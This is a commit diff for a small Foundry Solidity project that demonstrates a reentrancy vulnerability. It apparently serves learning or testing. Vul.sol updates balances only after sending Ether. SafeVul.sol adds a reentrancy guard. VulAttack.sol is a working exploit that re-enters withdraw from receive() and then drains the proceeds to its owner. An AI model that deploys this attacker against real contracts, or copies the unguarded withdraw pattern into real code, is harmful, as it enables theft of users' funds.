Implement test & drain vulnerability

13-04-26-test/.github/workflows/test.yml

@@ -0,0 +1,38 @@
+name: CI
+
+permissions: {}
+
+on:
+  push:
+  pull_request:
+  workflow_dispatch:
+
+env:
+  FOUNDRY_PROFILE: ci
+
+jobs:
+  check:
+    name: Foundry project
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v5
+        with:
+          persist-credentials: false
+          submodules: recursive
+
+      - name: Install Foundry
+        uses: foundry-rs/foundry-toolchain@v1
+
+      - name: Show Forge version
+        run: forge --version
+
+      - name: Run Forge fmt
+        run: forge fmt --check
+
+      - name: Run Forge build
+        run: forge build --sizes
+
+      - name: Run Forge tests
+        run: forge test -vvv

13-04-26-test/.gitignore

@@ -0,0 +1,14 @@
+# Compiler files
+cache/
+out/
+
+# Ignores development broadcast logs
+!/broadcast
+/broadcast/*/31337/
+/broadcast/**/dry-run/
+
+# Docs
+docs/
+
+# Dotenv file
+.env

13-04-26-test/.gitmodules

@@ -0,0 +1,3 @@
+[submodule "lib/forge-std"]
+	path = lib/forge-std
+	url = https://github.com/foundry-rs/forge-std

13-04-26-test/README.md

@@ -0,0 +1,66 @@
+## Foundry
+
+**Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust.**
+
+Foundry consists of:
+
+- **Forge**: Ethereum testing framework (like Truffle, Hardhat and DappTools).
+- **Cast**: Swiss army knife for interacting with EVM smart contracts, sending transactions and getting chain data.
+- **Anvil**: Local Ethereum node, akin to Ganache, Hardhat Network.
+- **Chisel**: Fast, utilitarian, and verbose solidity REPL.
+
+## Documentation
+
+https://book.getfoundry.sh/
+
+## Usage
+
+### Build
+
+```shell
+$ forge build
+```
+
+### Test
+
+```shell
+$ forge test
+```
+
+### Format
+
+```shell
+$ forge fmt
+```
+
+### Gas Snapshots
+
+```shell
+$ forge snapshot
+```
+
+### Anvil
+
+```shell
+$ anvil
+```
+
+### Deploy
+
+```shell
+$ forge script script/Counter.s.sol:CounterScript --rpc-url <your_rpc_url> --private-key <your_private_key>
+```
+
+### Cast
+
+```shell
+$ cast <subcommand>
+```
+
+### Help
+
+```shell
+$ forge --help
+$ anvil --help
+$ cast --help
+```

13-04-26-test/foundry.lock

@@ -0,0 +1,8 @@
+{
+  "lib/forge-std": {
+    "tag": {
+      "name": "v1.15.0",
+      "rev": "0844d7e1fc5e60d77b68e469bff60265f236c398"
+    }
+  }
+}

13-04-26-test/foundry.toml

@@ -0,0 +1,6 @@
+[profile.default]
+src = "src"
+out = "out"
+libs = ["lib"]
+
+# See more config options https://github.com/foundry-rs/foundry/blob/master/crates/config/README.md#all-options

13-04-26-test/script/Counter.s.sol

@@ -0,0 +1,19 @@
+// // SPDX-License-Identifier: UNLICENSED
+// pragma solidity ^0.8.13;
+
+// import {Script} from "forge-std/Script.sol";
+// import {Counter} from "../src/Counter.sol";
+
+// contract CounterScript is Script {
+//     Counter public counter;
+
+//     function setUp() public {}
+
+//     function run() public {
+//         vm.startBroadcast();
+
+//         counter = new Counter();
+
+//         vm.stopBroadcast();
+//     }
+// }

13-04-26-test/src/SafeVul.sol

@@ -0,0 +1,28 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.31;
+
+contract SafeVul {
+  bool private locked;
+
+  mapping(address => uint256) public balances;
+
+  function deposit() public payable {
+    balances[msg.sender] += msg.value;
+  }
+
+  modifier noReentrancy() {
+    require(!locked, 'Reentrant call detected');
+    locked = true;
+    _;
+    locked = false;
+  }
+
+  function withdraw(uint256 amount) public noReentrancy {
+    require(balances[msg.sender] >= amount, 'Insufficient balance');
+
+    balances[msg.sender] -= amount;
+
+    (bool success, ) = msg.sender.call{value: amount}('');
+    require(success, 'Transfer failed');
+  }
+}

13-04-26-test/src/Vul.sol

@@ -0,0 +1,19 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.31;
+
+contract Vul {
+  mapping(address => uint256) public balances;
+
+  function deposit() public payable {
+    balances[msg.sender] += msg.value;
+  }
+
+  function withdraw(uint256 amount) public {
+    require(balances[msg.sender] >= amount, 'Insufficient balance');
+
+    (bool success, ) = msg.sender.call{value: amount}('');
+    require(success, 'Transfer failed');
+
+    balances[msg.sender] -= amount;
+  }
+}

13-04-26-test/src/VulAttack.sol

@@ -0,0 +1,41 @@
+// SPDX-License-Identifier: MIT
+import {Vul} from './Vul.sol';
+pragma solidity ^0.8.31;
+
+contract VulAttack {
+  Vul public immutable vault;
+  address public immutable owner;
+  uint256 public attackAmount;
+  uint256 public totalBalance;
+
+  constructor(address _vault) {
+    vault = Vul(_vault);
+    owner = msg.sender;
+  }
+
+  function depositValue() external payable {
+    require(msg.value > 0, 'Need ETH to attack');
+    attackAmount = msg.value;
+
+    vault.deposit{value: msg.value}();
+  }
+
+  function attack(uint _amount) external payable {
+    require(_amount > 0, 'Need ETH to attack');
+
+    vault.withdraw(_amount);
+  }
+
+  receive() external payable {
+    if (address(vault).balance >= attackAmount) {
+      totalBalance += attackAmount;
+      vault.withdraw(attackAmount);
+    }
+  }
+
+  function drain() external {
+    require(msg.sender == owner, 'Not owner');
+    (bool ok, ) = owner.call{value: address(this).balance}('');
+    require(ok);
+  }
+}